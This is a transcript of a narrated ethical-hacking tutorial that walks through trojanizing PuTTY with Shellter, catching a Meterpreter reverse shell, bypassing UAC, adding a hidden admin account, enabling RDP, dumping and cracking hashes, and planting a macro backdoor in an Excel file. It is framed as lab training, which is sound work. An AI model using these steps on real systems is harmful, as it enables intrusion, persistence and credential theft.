Hi, welcome back. I think it's been a while since my last tutorial series regarding the ethical hacking. So this time I would like to continue with the missing steps. Like for example, I will start with continuing this privilege escalation in the same ethical hacking practical tutorial series for beginners. Now, for this one, I'm going to write some notes. Yeah. So we'll be using the VM. So the VM that we'll be using is the Windows 7. This is the target. The name of the Windows is test Win 7. Yeah. And then what else? The tool that we'll be using is metasploit framework. Okay. And we'll also use other tools, like for example, I'm going to show you the tool that you can actually use to create a simple backdoor called the tool's called shellter. Yeah, so I just put shellter. Okay, and let's see. So I will open up my Windows 7. So this is my target. Yeah, later on this is going to be my target. Okay, so I have already prepared several backdoors, but I'm also going to show you, let me just open up a Windows Explorer and let me move on to tools. Yeah, so let's review this. Okay, so this is shellter. Yeah, I've already downloaded shellter and did some testing. So I'm going to copy a tool, very famous tool called PuTTY, which is normally used to do remote administration. Okay, so this is our PuTTY. Yeah, if we run, we'll see something like this. Right, so this is PuTTY, and this will be our P target or pre-executable file that's going to be our target to be embedded with our backdoor. And then, so I'll run shellter. Yes, you can download shellter from shellter project. Yeah. So let me show you. So just type shellter project. So you can download this tool. This is a very good tool. I would personally advise that you explore the shellter here. You can download shellter. So this shellter, it was actually created to purposely evade the antivirus detection, the AV detection. And you can actually install shellter 7.1, which is the latest version, on Windows or on Linux through Wine. Okay. Now let's get back to our shellter. So I'll run shellter. Small window. Let me adjust this to consolas, maybe like big one, so that you can see how it's so this is shellter. Let me just minimize this. Okay, so shellter is not currently running as admin, so you don't really have to worry this, but in case you need to alleviate privileges, I would personally recommend you to open your Windows command shell or the prompt by elevating the privilege. Select this one and then run as administrator. It will actually open up the Microsoft command windows in elevated privilege. Let's go to the same folder, which is demos. Oops. Let's say demo. Yeah. And you go to the backdoor. Let me see. See the malware. Okay. And let's go to, oh, sorry. It's supposed to be shellter, tools, shellter, shellter. Yeah. And you can run shellter from here, shellter. Yeah. Okay. And adjust the screen to something like 24 or 28 with bold font so that you can see this one. Yeah. Okay, so this is shellter. All right. So when you start shellter, you can choose whether you want the operations to be automatic or manual. So by default, maybe just select A, which is for the automated process or operation mode. We do not perform online checks, so no. And now this is where you actually add or I would say specify the PE target, the executable file that you want to embed. In this case, we are going to use putty, right? So this is our target. So just type putty. So make sure that putty or whatever PE target you want to be embedded with the backdoor or the payload in the same directory or folder. Make sure that the file is on the same folder. Yeah. In the same folder. Okay, so press enter and it will do the processing. Yeah, it's going to take a while. Now notice that we have the instruction here. Yeah, here, and then just wait for a while. It's going to take about perhaps a few seconds to finish this. Now, meanwhile, while waiting for this, oops, it's already done. So let's just finish this. Enable stealth mode. The stealth mode is good to actually hide your payload or even your executable file in a hidden as a hidden process. So perhaps you just try this one. Maybe if you don't know, it's okay. Just select yes, and then this is where you select the payload that we're going to use. My favorite payload is 2, so I will just select listed payload and number 1, and you specify the host. So the host now is the host here supposed to be the host that will get the connection from the target machine. So for example here, let me just check my host IP, which is Kali. So I have config. Okay, so my target is this. Okay, so I'm going to set this to 131.107.1.252, and you can specify the L port. Like I could normally, or I would say I like port 443. You could just use 443 to evade the firewall, because most of the firewall allow outbound 443, yeah, from the client machine. Yeah, we're done with this one. Yeah, so injection verified. Now I'll close this window, go back to shellter folder, and yeah, so this is putty. I will just copy this to our desktop, And if you really compare the so by default when you run shellter, it will actually create a backup of a file inside the shellter backup folder. Yes, you can see here is under the shellter backup, right? So we can also see PuTTY. You can right click here. This is the original PuTTY before the injection. And let's open PuTTY that was actually injected with the backdoor. And minimize this. Now notice that we have several things here. So because you can see that the size is almost the same. Yeah. So the injected one has about 500 bytes, while the original one was actually 495. So small injection, small code injected, as you can see here. So users will not really notice this, okay? And then so from on Kali, yeah, in order to do the privilege escalation, we need to just set up a simple listener. So we'll do this one, MSF console, right? Maximize this so that we can see the whole screen. Okay, now let me clear the screen and then type use exploit multi-handler, and we need to set the same payload. Set payload Windows threader, and then reverse TCP. So the payload that we're using now should be the same, or I would say must be the same as the payload that you have set in our previous step. Yeah, so set the L host. This is the host. This is actually Kali's host IP 131.167.1.252, and specify the local host. Local port that is used to listen to, or this listening port. Set L port 443, and then you can just type exploit. This will create a reverse TCP handler. This is called listener, right? And then from test win7, let's just double click the file. We pretend that we do not know that the file has been injected with the backdoor, so just double click and see what happened. Notice that the PuTTY configuration will come up, yeah, as usual. And if we go back to this Kali, you can see that Kali, our machine got metasploit session. Yeah, we got metasploit already, just like what I have already explained in my previous videos, that this is metasploit, very powerful and intelligent payload. Now we just type sysinfo just to make sure that we are on the same machine, on the target machine. Now I need to check my privilege level. Okay, I need to check my privilege level. Just wait for a while. So I need to shut down my phone because it's really disturbing. Okay, hang on for a while. So now let's check the privilege that we have. So just type get priv. This will show you the privilege level. And notice that we have very little privileges, right? And then maybe you can try to escalate by using a normal way, like if we run the metasploit, just type help. And we got this get system, which will allow you to elevate your privilege to that of local system. So let's try this one, get system, and operation failed. Notice that operation is failed. The following was attempted. So it looks like we do not have the privilege that we need. Yeah, you can try to also go to the command prompt on your target machine by typing shell. Let's see. Okay, then we just type who am I, and we are normal user, which is pentest, and type exit to go back. Now, since you have the session, you can just type sessions minus L, interact with different session, or maybe just type session. Okay, nothing is there. Let me see, this works the same as calling this from MSF shell, session minus I. Oh yeah, because we're already inside the metasploit, so we cannot see the session. So let's try this one. Put the session into a background by by pressing Ctrl Z, yeah, and just select, type yes, and then type session minus L. Yeah, so we still have the session. This is our session created based on the backdoor execution. All right, so just leave it running. And then what we're going to do is how can I actually elevate our privilege, right? So here we need to remember that we still have the session 1, right? So let's go back, yeah, and then just step back to go back to the root, and then search for, because this is Windows 7, as you can see from the previous, so it shows Windows 7, Windows version 6.1, yeah, and we can also look at the previous operating system on metasploit is running operating system Windows 7 Service Pack 1, yeah. Now next, what we need to do is we will search for UAC. So Windows 7 and the later version has UAC. This is the user access control, if I'm not mistaken. Yeah. So we can try this one. This is one of the exploit that would help us to escalate the UAC protection. Yeah. So bypassing UAC protection, I just copy this. Okay. Now just type use, or maybe info, and press insert. So it says that this is actually provided by David Kennedy, yeah, Village, and it shows you that this is a Windows escalate UAC protection bypass. So we need to specify the, okay, so we just type use, and then, oh, sorry, supposed to be, yeah, sorry. So type search again. I was, yeah, info, and then I will just repeat this by typing use, enter, and you can specify the payload, set payload Windows metasploit reverse TCP, and you can specify the options. Just type the options first, show options, see what we need. Okay, so we will specify the L host, so set L host 131.107.1.252, and you can also specify the same port, or maybe you can just use the original port, which is 4444, and then you can try to, yeah, we need to also specify session here, the session to run this module on. So let's type sessions minus IL, sorry, and this is we have session 1, so just type set session 1 and exploit. Okay, looks like we got the metasploit session 2 open. bypass UAC by passing this setting, continuing as administrator, part of administrator group, And now from here, notice that previously when you type, let's just type sysinfo. We're still on task win7, which is our target. And then now we type get brief. Wow, we have full privileges, a lot of what you call these privileges we can take advantage of. Now let's try to run shell and type who am I. Still pen test, right? So just type exit. Now let's try get system, and let's say get brief again. We have a lot of privileges, and then type shell and type who am I. Now we are the NT system, right? So we were able to actually escalate our privilege level from the pentest user, which is actually the normal user, with the or to the Windows NT authority system. Now we can do a lot of more things. Okay, now if you want to maintain your footprint, your foothold, then you can actually type, because you have the full access. Now we can actually do something like this: net user. You can create a user called, let's say, don't create an obvious name. Try to create something that is not really obvious, like help desk, and you can put a password and add. This is to create a user. So we have successfully run a command. We have successfully created the user. Now add this user as the member of admin by typing net local group administrators and then help desk /add. Done. And now we type net user to see what we have created. We got this help user. Then let's repeat the command, net local group to see whether, local group. We need to type complete one, net local group administrators. And notice that the member of admin, pentest, supposed to be help desk, because pentest was already there. So help desk is the member of local administrators group. Okay. Now you can also try to enable remote desktop or something like that. Let's try to open a new terminal and then type R desktop to, let's say, 131.107.1. Okay, let's get back to the screen and then type info IP config. So we got the IP, which is the, let me see, interface 1. We got here. This is our, we have several interfaces. And we got this, and we got the, we have this one, 131.107.1.222, and you can go back to this one, just type 222. It looks like a remote desktop is not running, so let's see what you can do here. I remember there's a command or a script that will allow you to enable remote desktop. Let's try this one, run get GUI -h. It says that metasploit script is deprecated. But still, we can still use this one. So it says that we can actually run the post Windows manage enable RDP option with a value. And then you can also run this one, get GUI -i or -e. So just type this -e. All right, let's see. It's enabling remote desktop. Okay, let's try to connect. And bingo, we got the access to Windows 7 Ultimate. Okay, wow. All right, so minimize this, yeah. And then because we have already created the user called help desk, you can actually try to log on. Let's say help desk and put a password that we have created. And now notice that if there's a user who currently log on to this PC, yeah, to this Windows 7, the user will be disconnected. So you might want to do this, or you may not want to do this, because it will definitely get the user's attention. Yeah. So anyway, we'll try, and let's see what happened here. Say, someone is logging on. Yeah, help desk want to connect. So do you want to connect, or do you want to allow? Yeah. So let's say yes. Okay. So yeah, notice that we have this help desk created. Yeah. So from the perspective of the attacker, so we have full access to your Windows 7, which I can access from here. Yeah. I would personally suggest in the ethical hacking activities, I would suggest that you do not use the remote desktop, because it will draw an attention of the user who currently log on to the PC. Yeah, so it's actually better to use the command line tools like Meterpreter commands or any other Windows command to actually do some testing. Yeah. Like for example, you can also run a command line tool that will allow you to do a lot of things. Like for example, just type, let's say, instead of typing shell, you can also type, you can do the typing of, for example, shell, which will give you the C prompt. Yeah. Or you can also do something like this, which is better, yeah, from my perspective. Just type execute. Yeah, then you specify H minus or dash H. So you can hide the process. See this one, hidden from view. You go to this one, and just type execute dash big H, the capital H, and then minus or dash I to interact with the process. And then after that, you specify the file that you want to execute, like cmd.exe. And press enter. Okay, so and if you check who am I, I'm still Pentest, right? So this was actually perhaps it was actually that the credential was cached. That's why when you check who am I, I'm currently logging on as the Pentest, right? So then you can try to, let's say, type, let's say, echo. See, we can actually write something, let's say hacked, then put hacked.txt. Bingo, and then type there. And you can see that hack.txt was actually created. Yeah, so mission accomplished. Yeah. All right, so another way of actually doing the privilege escalation is to see, we can actually grab the hash, just type hash dump, and this hash would allow you to also escalate your privilege, because you can actually crack this, or you can do the pass the hash by copying this, yeah, and use this to attack servers, for example, yeah, or try to crack this by looking at the, let's say, crack station. Yeah, so just copy the hash the last one here. This is actually the NTLM hash. Yeah, copy and paste this. Select I'm not robot and then crack hashes. And bingo, we got a password. Okay. All right. So yeah. Beside that, we can also use other technique such as, let's get back to this one. You can also use the backdoor that was actually injected into let's say a financial report.excel. Yeah, this is the Excel file. Yeah, so if you open up the metasploitable unleashed, yeah, you can also see how to actually do the exploitation on the client side. Yeah, so scroll down until you see the client side attack. Yeah, you can see also how we can actually use or take advantage of the vbscript infection method. Yeah, which allows you to inject the vbscript, so the vbscript for application on, let's say, Word or Excel. Yeah, so you can follow the step-by-step, vbscript infection method. Yeah, and then yeah, let me demonstrate with for you the use of this vbscript. Yeah, so let's exit from this one. Yeah, and we run the Meterpreter. Let me see, we have another terminal open. Just close it. So I will do the same method. Yeah. So use exploit multi-handler. Set payload, the same payload. And set the L host, set the L port, and exploit. Okay, and then yeah, I can just send this to a friend, yeah, or anyone in the company, and then let them open it. So let me just copy this to the desktop just to show you, so that I don't have to open this folder. So just double click the financial report, and let's see what happened on my Kali. And that's it. I got Meterpreter session open. Now, why these things happen? Well, looks like my PCs or my laptop hangs. Yeah, okay, just temporary. So you know why this one happens is because let's see. Now in Excel you can actually go to the option. Let's look at the option. Yeah, so let's have a look at the option. Where is it? Yeah, there's an option under the tools option. In fact, if you look at the security on the security tab and select macro security, notice that the macro here, macro security here was set to low, which is not recommended. That's why when you double click the file to open it, it will automatically invoke or run or launch the script, the embedded script. Yeah. So the script was actually embedded into this one. Let's open up a tool and macro, and then select the Visual Basic Editor. So as you can see here, I got this script injected. Yeah, PBA. Yeah, it will create an executable file with random characters, and when this script invoked, I mean the macro script is invoked or launched or executed, it will actually create the reverse TCP shell, because we have purposely crafted this malicious backdoor. All right, so Same thing. Yeah, we got the access, and you can do the privilege escalation as we have already learned in the previous step. All right, so that's the end of my tutorial in our tutorial series, and now we are here, step 6, privilege escalation. Yeah, by taking advantage of the metasploit framework, the shellter, and also the we call it as application or client tools is like vbscript for application, or VBA, that is actually injected into the Excel as macro. Okay. All right. So I hope you enjoyed this, and that's all for now. And thank you very much for your attention, and see you next time. Bye bye.